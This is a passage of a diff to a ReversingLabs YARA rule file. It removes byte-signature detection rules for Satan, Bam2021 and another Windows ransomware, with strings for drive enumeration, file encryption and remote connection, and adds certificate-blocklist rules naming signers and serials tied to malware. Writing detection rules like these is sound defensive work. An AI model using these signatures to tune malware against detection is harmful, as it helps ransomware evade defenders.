-            83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ??
-            ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE C6 45 ?? ?? F7 E9 83 C4 ?? C1 FA ?? 8B DA C1 EB
-            ?? 03 DA 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
-            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
-            ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ??
-            ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE 89 7D ?? F7 E9 83 C4 ?? 89 5D ?? C1 FA ?? 8D 4D
-        }
-		$enum_drives_p2 = {
-            8B C2 C1 E8 ?? 03 C2 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? FF 75
-            ?? 50 51 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B
-            4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 FF ?? 0F 8C ??
-            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? C6 45 ?? ?? 8B 4D ?? 8B 31
-            3B F1 0F 84 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 8B C8 C6 45
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 C6 45 ?? ?? 8B 4E ?? 89 4F ?? 8B 4E ?? 89 4F ?? 8D
-            4F ?? 8B 46 ?? 89 47 ?? 8D 46 ?? 3B C8 74 ?? 83 78 ?? ?? 8B D0 72 ?? 8B 10 FF 70 ??
-            52 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_drives_p* ) ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTH PROPERTY LTD" and pe.signatures [ i ] . serial == "23:96:64:c1:2b:ae:b5:a6:d7:87:91:28:88:05:13:92" and 1618272000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Satan : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0218Ebfd5A9Bfd55D2F661F0D18D1D71 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Satan ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7ec379d8-172c-52ee-9284-6898dd446468"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "d03619c7-c4e8-57bd-a19e-1452ab7a76df"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Satan.yara#L1-L152"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12066-L12082"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0074090c2a6cc483deffdc83dc1c0bfbd150e201c27e54f998dd2c0a7660f917"
+		logic_hash = "4aabe3beab0055b6ef8f6114c5236940f5693b44e94efd14132b450bb9232c03"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Satan"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 6A ??
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF D3 8B 3D ?? ?? ?? ?? 6A ?? 56 FF D7 8D 45 ?? 50
-            8D 45 ?? 50 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 89 85 ?? ?? ??
-            ?? FF D3 8B 9D ?? ?? ?? ?? 6A ?? 53 FF D7 68 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 83 C4
-            ?? 8B F0 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 39 7D ?? 76 ?? 68 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 6A ?? 51 50
-            56 FF B5 ?? ?? ?? ?? 03 F8 FF 15 ?? ?? ?? ?? 39 7D ?? 77 ?? 8B 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 53 FF D6 FF B5 ??
-            ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5
-            5D C3
-        }
-		$search_processes = {
-            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 50
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 0F 1F
-            44 00 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 8B 4C B5 ??
-            8D 85 ?? ?? ?? ?? 0F 1F 44 00 ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75
-            ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? FF D7 6A ?? 50 FF D3 46 83 FE ?? 76 ?? 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B
-            E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ??
-            ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 4D
-            ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 83 CB ?? 89
-            5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 F6 89 75 ?? 89 75 ?? 56 68 ?? ??
-            ?? ?? 6A ?? 56 6A ?? 6A ?? 51 8B 3D ?? ?? ?? ?? FF D7 89 45 ?? 3B C3 0F 84 ?? ?? ??
-            ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? FF 75 ?? FF D7 8B D8 89 5D ?? 83 FB ?? 0F
-            84 ?? ?? ?? ?? 8B 7D ?? 8B 07 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 56 56 68 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF
-            75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ??
-            FF 75 ?? 68 ?? ?? ?? ?? FF 37 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 32 C0 89 45 ?? 88
-            45 ?? 33 FF 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 FF 75
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0F B6 C0 81 7D ?? ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 0F 42 C1 89 45 ?? 88 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 56 6A ?? 0F B6
-            C0 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 85 FF 75 ?? 57 8D 45 ?? 50 68 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 47 89 7D ?? 8B 45 ?? 84 C0 0F 84 ?? ?? ?? ?? 80 7D ?? ??
-            74 ?? 83 05 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 45 ??
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$search_files_in_specific_folders_p1 = {
-            51 8D 85 ?? ?? ?? ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B F0 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 FF
-        }
-		$search_files_in_specific_folders_p2 = {
-            75 ?? FF 75 ?? 8D 55 ?? 8B CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85
-            F6 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 FF ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 8B
-            CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41
-            84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 6A ?? 40 8D 4D ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0
-            8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            EC ?? C6 45 ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83
-            EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 84
-            C0 8D 8D ?? ?? ?? ?? 0F 94 C3 EB ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8A D8
-        }
-		$search_files_in_specific_folders_p3 = {
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 DB 8B 9D ?? ?? ?? ?? 74 ?? 8D 45 ??
-            8B CB 50 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
-            ?? 33 F6 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ??
-            ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ??
-            ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_processes and ( all of ( $search_files_in_specific_folders_p* ) ) and $encrypt_files and $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REI LUX UK LIMITED" and pe.signatures [ i ] . serial == "02:18:eb:fd:5a:9b:fd:55:d2:f6:61:f0:d1:8d:1d:71" and 1608508800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Bam2021 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_35590Ebe4A02Dc23317D8Ce47A947A9B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Bam2021 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "31ae99e3-223c-51fb-97c1-353ff063057f"
-		date = "2021-09-17"
-		modified = "2021-09-17"
+		id = "2f72a686-c30c-572d-a78c-03747ac325b6"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Bam2021.yara#L1-L167"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12084-L12100"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5b717510991b78f07806e88f3dfe1c27d6ec1ec21af61a7c4f1edf7c915785d5"
+		logic_hash = "2d4bc88943cdc8af00effab745e64e60ef662c668a0b2193c256d11831ef1554"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Bam2021"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_shares = {
-            83 EC ?? 53 55 8B 2D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? FF D5 8B 74 24 ?? 6A ?? 56 C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24
-            ?? 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 89 06 33 C0 5F 5E
-            5D 5B 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85
-            FF 75 ?? 89 06 8B 44 24 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8D 4C 24
-            ?? 51 57 8D 54 24 ?? 52 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ?? ?? ?? 33 DB 39 5C
-            24 ?? 76 ?? 8D 77 ?? 90 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44
-            24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 06 50 C7 44 24 ?? ?? ?? ?? ?? 89 44 24
-            ?? FF D5 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 3E E8 ?? ??
-            ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 46 ?? 83 E0 ?? 3C ??
-            75 ?? 8B 4C 24 ?? 8B 44 24 ?? 51 8D 56 ?? 52 50 E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24
-            ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 74 ?? 56 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 31 57 FF 15 ?? ?? ?? ?? 8B 54 24 ?? 52 E8 ?? ?? ??
-            ?? 8B F0 85 F6 74 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 30 33
-            C0 5F 5E 5D 5B 83 C4 ?? C2
-        }
-		$find_files_p1 = {
-            8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8
-            ?? 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 3B D5 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C5 0F 84 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 3B D5 74
-            ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0
-            83 D8 ?? 3B C5 0F 84 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8C 24
-            ?? ?? ?? ?? 51 BB ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 9C 24 ?? ??
-            ?? ?? 8D 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 8D 8C 24
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? 8B 54 24 ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 66 89 44 24 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 54 24 ?? 8B 44 24 ?? 42 3B C2 77 ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24
-            ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 34 0A 3B C6 77 ?? 2B F0 8B 44 24 ?? 39 2C B0 75 ?? 6A
-            ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 04 B1 8B 54 24 ?? 8B 0C B2 89 4C 24 ?? 89
-        }
-		$find_files_p2 = {
-            4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? 3B CD 74 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 89 69 ?? 6A
-            ?? 66 89 41 ?? 55 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 44
-            24 ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 73 ?? 8D 84 24 ??
-            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 50 68 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 47 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ??
